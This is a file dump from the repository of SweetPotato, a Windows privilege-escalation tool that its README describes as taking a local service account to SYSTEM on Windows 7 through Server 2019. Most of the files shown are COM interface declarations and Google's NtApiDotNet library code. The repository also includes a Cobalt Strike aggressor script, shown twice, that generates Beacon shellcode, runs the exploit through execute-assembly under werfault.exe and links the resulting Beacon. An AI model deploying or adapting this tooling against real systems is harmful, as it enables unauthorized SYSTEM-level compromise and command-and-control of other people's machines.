17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpPotato")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpPotato")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/README.md:
--------------------------------------------------------------------------------
1 | # SweetPotato
2 | Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019.
3 |
4 | A rewrite of JuicyPotato that is now compatible with execute-assembly with some extras discovered by @decoder_it
5 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/SweetPotato.cna:
--------------------------------------------------------------------------------
1 | # SweetPotato built as C# exe
2 |
3 | sub SweetPotato {
4 | local('$shellcode $arch $program $exe $parm');
5 |
6 | # acknowledge this command
7 | btask($1, "Task Beacon to run " . listener_describe($2) . " via SweetPotato (ms16-075)", "T1068");
8 |
9 | # tune our parameters based on the target arch
10 | if (-is64 $1)
11 | {
12 | $arch = "x64";
13 | } else {
14 | $arch = "x86";
15 | }
16 | $program = "c:\\windows\\system32\\werfault.exe";
17 | $exe = script_resource("SweetPotato.exe");
18 | # generate our shellcode
19 | $shellcode = base64_encode(payload($2, $arch));
20 | # -c 4991D34B-80A1-4291-83B6-3328366B9097
21 | $parm = "-l 6363 "."-p $program "."-s $shellcode";
22 | # spawn a Beacon post-ex job with bexecute_assembly
23 | bexecute_assembly!($1,$exe,$parm);
24 | # link to our payload if it's a TCP or SMB Beacon
25 | beacon_link($1, $null, $2);
26 | }
27 | beacon_exploit_register("SweetPotato", "SweetPotato (ms16-075)", &SweetPotato);
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/SweetPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.779
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/bin/Release/SweetPotato.cna:
--------------------------------------------------------------------------------
1 | # SweetPotato built as C# exe
2 |
3 | sub SweetPotato {
4 | local('$shellcode $arch $program $exe $parm');
5 |
6 | # acknowledge this command
7 | btask($1, "Task Beacon to run " . listener_describe($2) . " via SweetPotato (ms16-075)", "T1068");
8 |
9 | # tune our parameters based on the target arch
10 | if (-is64 $1)
11 | {
12 | $arch = "x64";
13 | } else {
14 | $arch = "x86";
15 | }
16 | $program = "c:\\windows\\system32\\werfault.exe";
17 | $exe = script_resource("SweetPotato.exe");
18 | # generate our shellcode
19 | $shellcode = base64_encode(payload($2, $arch));
20 | # -c 4991D34B-80A1-4291-83B6-3328366B9097
21 | $parm = "-l 6363 "."-p $program "."-s $shellcode";
22 | # spawn a Beacon post-ex job with bexecute_assembly
23 | bexecute_assembly!($1,$exe,$parm);
24 | # link to our payload if it's a TCP or SMB Beacon
25 | beacon_link($1, $null, $2);
26 | }
27 | beacon_exploit_register("SweetPotato", "SweetPotato (ms16-075)", &SweetPotato);
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-CS-old/bin/Release/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-CS-old/bin/Release/SweetPotato.exe
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/.vs/SweetPotato/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/.vs/SweetPotato/v16/.suo
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IEnumSTATSTG.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport]
6 | [Guid("0000000d-0000-0000-C000-000000000046")]
7 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
8 | public interface IEnumSTATSTG {
9 | // The user needs to allocate an STATSTG array whose size is celt.
10 | [PreserveSig]
11 | uint
12 | Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched);
13 |
14 | void Skip(uint celt);
15 |
16 | void Reset();
17 |
18 | [return: MarshalAs(UnmanagedType.Interface)]
19 | IEnumSTATSTG Clone();
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/ILockBytes.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComVisible(false)]
6 | [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
7 | public interface ILockBytes {
8 | //Note: These two by(reference 32-bit integers (ULONG) could be used as return values instead,
9 | // but they are not tagged [retval] in the IDL, so for consitency's sake...
10 | void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
11 | void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
12 | void Flush();
13 | void SetSize(long cb);
14 | void LockRegion(long libOffset, long cb, int dwLockType);
15 | void UnlockRegion(long libOffset, long cb, int dwLockType);
16 | void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);
17 |
18 | }
19 |
20 |
21 | }
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IMarshal.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 |
6 | [Guid("00000003-0000-0000-C000-000000000046")]
7 | [InterfaceType(1)]
8 | [ComConversionLoss]
9 | [ComImport]
10 | public interface IMarshal {
11 |
12 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid);
13 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize);
14 | void MarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS);
15 | void UnmarshalInterface([MarshalAs(28)] [In] IStream pstm, [In] ref Guid riid, out IntPtr ppv);
16 | void ReleaseMarshalData([MarshalAs(28)] [In] IStream pstm);
17 | void DisconnectObject([In] uint dwReserved);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IStorage.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 |
6 | [InterfaceType(1)]
7 | [ComConversionLoss]
8 | [Guid("0000000B-0000-0000-C000-000000000046")]
9 | [ComImport]
10 | public interface IStorage {
11 | void CreateStream([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
12 | void OpenStream([MarshalAs(21)] [In] string pwcsName, [In] IntPtr reserved1, [In] uint grfMode, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
13 | void CreateStorage([MarshalAs(21)] [In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStorage ppstg);
14 | void OpenStorage([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgPriority, [In] uint grfMode, [In] IntPtr snbExclude, [In] uint reserved, [MarshalAs(28)] out IStorage ppstg);
15 | void CopyTo([In] uint ciidExclude, [MarshalAs(42, SizeParamIndex = 0)] [In] Guid[] rgiidExclude, [In] IntPtr snbExclude, [MarshalAs(28)] [In] IStorage pstgDest);
16 | void MoveElementTo([MarshalAs(21)] [In] string pwcsName, [MarshalAs(28)] [In] IStorage pstgDest, [MarshalAs(21)] [In] string pwcsNewName, [In] uint grfFlags);
17 | void Commit([In] uint grfCommitFlags);
18 | void Revert();
19 | void EnumElements([In] uint reserved1, [In] IntPtr reserved2, [In] uint reserved3, [MarshalAs(28)] out IEnumSTATSTG ppEnum);
20 | void DestroyElement([MarshalAs(21)] [In] string pwcsName);
21 | void RenameElement([MarshalAs(21)] [In] string pwcsOldName, [MarshalAs(21)] [In] string pwcsNewName);
22 | void SetElementTimes([MarshalAs(21)] [In] string pwcsName, [MarshalAs(42)] [In] FILETIME[] pctime, [MarshalAs(42)] [In] FILETIME[] patime, [MarshalAs(42)] [In] FILETIME[] pmtime);
23 | void SetClass([In] ref Guid clsid);
24 | void SetStateBits([In] uint grfStateBits, [In] uint grfMask);
25 | void Stat([MarshalAs(42)] [Out] STATSTG[] pstatstg, [In] uint grfStatFlag);
26 | }
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Com/IStream.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SweetPotato {
5 | [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
6 | public interface IStream {
7 | void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead);
8 | void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten);
9 | void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);
10 | void SetSize(long libNewSize);
11 | void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);
12 | void Commit(uint grfCommitFlags);
13 | void Revert();
14 | void LockRegion(long libOffset, long cb, uint dwLockType);
15 | void UnlockRegion(long libOffset, long cb, uint dwLockType);
16 | void Stat(out STATSTG pstatstg, uint grfStatFlag);
17 | void Clone(out IStream ppstm);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Forms/Lock.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/NtApiDotNet/Forms/Lock.ico
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/INtTransaction.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
17 | ///
18 | /// Interface to abstract the kernel transaction manager support.
19 | ///
20 | public interface INtTransaction
21 | {
22 | ///
23 | /// Get handle for the transaction.
24 | ///
25 | SafeKernelObjectHandle Handle { get; }
26 |
27 | ///
28 | /// Commit the transaction
29 | ///
30 | void Commit();
31 |
32 | ///
33 | /// Rollback the transaction
34 | ///
35 | void Rollback();
36 |
37 | ///
38 | /// Enable the transaction for anything in the current thread context.
39 | ///
40 | /// The transaction context. This should be disposed to disable the transaction.
41 | TransactionContext Enable();
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/INdrConformantStructure.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | ///
18 | /// Interface for a marshalled NDR conformant structure.
19 | ///
20 | /// This interface is primarily for internal use only.
21 | public interface INdrConformantStructure : INdrStructure
22 | {
23 | ///
24 | /// Gets the number of conformant dimensions, should be at least one.
25 | ///
26 | /// The number of conformant dimensions.
27 | int GetConformantDimensions();
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/INdrNonEncapsulatedUnion.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | ///
18 | /// Interface for a marshalled non-encapsulated NDR union.
19 | ///
20 | /// This interface is primarily for internal use only.
21 | public interface INdrNonEncapsulatedUnion : INdrStructure
22 | {
23 | ///
24 | /// Marshal the union to a stream.
25 | ///
26 | /// The selector for union arm.
27 | /// The marshal stream.
28 | void Marshal(NdrMarshalBuffer marshal, long selector);
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/INdrStructure.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | ///
18 | /// Interface for a marshalled NDR structure.
19 | ///
20 | /// This interface is primarily for internal use only.
21 | public interface INdrStructure
22 | {
23 | ///
24 | /// Marshal the stucture to a stream.
25 | ///
26 | /// The marshal stream.
27 | void Marshal(NdrMarshalBuffer marshal);
28 | ///
29 | /// Unmarshal the structure from a stream.
30 | ///
31 | /// The unmarshal stream.
32 | void Unmarshal(NdrUnmarshalBuffer unmarshal);
33 | ///
34 | /// Get the structure's alignment.
35 | ///
36 | ///
37 | int GetAlignment();
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrContextHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Ndr.Marshal
18 | {
19 | ///
20 | /// Structure to represent a context handle.
21 | ///
22 | public struct NdrContextHandle
23 | {
24 | ///
25 | /// Context handle attributes.
26 | ///
27 | public int Attributes { get; }
28 |
29 | ///
30 | /// Context handle UUID.
31 | ///
32 | public Guid Uuid { get; }
33 |
34 | ///
35 | /// Constructor.
36 | ///
37 | /// Context handle attributes.
38 | /// Context handle UUID.
39 | public NdrContextHandle(int attributes, Guid uuid)
40 | {
41 | Attributes = attributes;
42 | Uuid = uuid;
43 | }
44 |
45 | ///
46 | /// Overidden ToString method.
47 | ///
48 | /// The handle as string.
49 | public override string ToString()
50 | {
51 | return $"Handle: {Uuid} - Attributes: {Attributes}";
52 | }
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrEmpty.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | ///
18 | /// Structure to represent an empty value.
19 | ///
20 | public struct NdrEmpty
21 | {
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrInterfacePointer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Rpc;
16 |
17 | namespace NtApiDotNet.Ndr.Marshal
18 | {
19 | ///
20 | /// Class to represent an NDR interface pointer.
21 | ///
22 | public struct NdrInterfacePointer : INdrConformantStructure
23 | {
24 | ///
25 | /// The marshaled interface data.
26 | ///
27 | public byte[] Data { get; set; }
28 |
29 | ///
30 | /// Constructor.
31 | ///
32 | /// The marshaled interface data.
33 | public NdrInterfacePointer(byte[] data)
34 | {
35 | Data = data;
36 | }
37 |
38 | int INdrConformantStructure.GetConformantDimensions()
39 | {
40 | return 1;
41 | }
42 |
43 | void INdrStructure.Marshal(NdrMarshalBuffer marshal)
44 | {
45 | RpcUtils.CheckNull(Data, "Data");
46 | marshal.WriteInt32(Data.Length);
47 | marshal.WriteConformantByteArray(Data, Data.Length);
48 | }
49 |
50 | void INdrStructure.Unmarshal(NdrUnmarshalBuffer unmarshal)
51 | {
52 | unmarshal.ReadInt32(); // length.
53 | Data = unmarshal.ReadConformantByteArray();
54 | }
55 |
56 | int INdrStructure.GetAlignment()
57 | {
58 | return 4;
59 | }
60 | }
61 | }
62 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrPipe.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Ndr.Marshal
18 | {
19 | ///
20 | /// Placeholder for a NDR pipe type.
21 | ///
22 | /// The base type of pipe blocks.
23 | public class NdrPipe where T : struct
24 | {
25 | ///
26 | /// Pull a block from a pipe.
27 | ///
28 | /// The maximum number of elements to pull.
29 | /// The pulled block.
30 | public T[] Pull(int count)
31 | {
32 | throw new NotImplementedException("Pipe support not implemented");
33 | }
34 |
35 | ///
36 | /// Push a block to a pipe.
37 | ///
38 | /// The block to push.
39 | public void Push(T[] data)
40 | {
41 | throw new NotImplementedException("Pipe support not implemented");
42 | }
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/Marshal/NdrUnsupported.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Ndr.Marshal
16 | {
17 | ///
18 | /// Place holder for unsupported types.
19 | ///
20 | public class NdrUnsupported
21 | {
22 | private NdrUnsupported()
23 | {
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/NdrParserException.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Ndr
18 | {
19 | ///
20 | /// Exception thrown when NDR parsing fails.
21 | ///
22 | public class NdrParserException : ApplicationException
23 | {
24 | ///
25 | /// Constructor.
26 | ///
27 | /// Exception message.
28 | public NdrParserException(string message)
29 | : base(message)
30 | {
31 | }
32 |
33 | ///
34 | /// Constructor.
35 | ///
36 | /// Exception message.
37 | /// Inner exception to wrap.
38 | public NdrParserException(string message, Exception inner_exception)
39 | : base(message, inner_exception)
40 | {
41 | }
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Ndr/NdrProtocolSequenceEndpoint.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Utilities.Memory;
16 | using System;
17 |
18 | namespace NtApiDotNet.Ndr
19 | {
20 | ///
21 | /// Class respresenting an RPC protocol sequence.
22 | ///
23 | [Serializable]
24 | public class NdrProtocolSequenceEndpoint
25 | {
26 | ///
27 | /// The protocol sequence for the endpoint.
28 | ///
29 | public string ProtocolSequence { get; }
30 | ///
31 | /// The endpoint name.
32 | ///
33 | public string Endpoint { get; }
34 |
35 | internal NdrProtocolSequenceEndpoint(RPC_PROTSEQ_ENDPOINT protseq, IMemoryReader reader)
36 | {
37 | ProtocolSequence = protseq.GetRpcProtocolSequence(reader);
38 | Endpoint = protseq.GetEndpoint(reader);
39 | }
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtAlpcUtils.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet
16 | {
17 | ///
18 | /// Static utilities for ALPC.
19 | ///
20 | internal static class NtAlpcUtils
21 | {
22 | internal static SafeAlpcMessageAttributesBuffer GetAttributesBuffer(this DisposableList list, IMessageAttributes attrs)
23 | {
24 | return attrs == null ? SafeAlpcMessageAttributesBuffer.Null : list.AddResource(attrs.ToSafeBuffer());
25 | }
26 |
27 | internal static SafeAlpcPortMessageBuffer GetMessageBuffer(this DisposableList list, AlpcMessage message)
28 | {
29 | if (message == null)
30 | {
31 | return SafeAlpcPortMessageBuffer.Null;
32 | }
33 | return list.AddResource(message.ToSafeBuffer());
34 | }
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtApiDotNet.Core.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | NtApiDotNet
5 | netstandard2.0
6 | NtApiDotNet
7 | James Forshaw
8 | Google Inc.
9 | NtApiDotNet
10 | 1.1.27.0
11 | Copyright © Google Inc. 2016-2020
12 | 1.0.0.0
13 | https://www.apache.org/licenses/LICENSE-2.0
14 | https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/NtApiDotNet.nuspec:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $id$
5 | $version$
6 | NtApiDotNet
7 | James Forshaw
8 | James Forshaw
9 | Apache-2.0
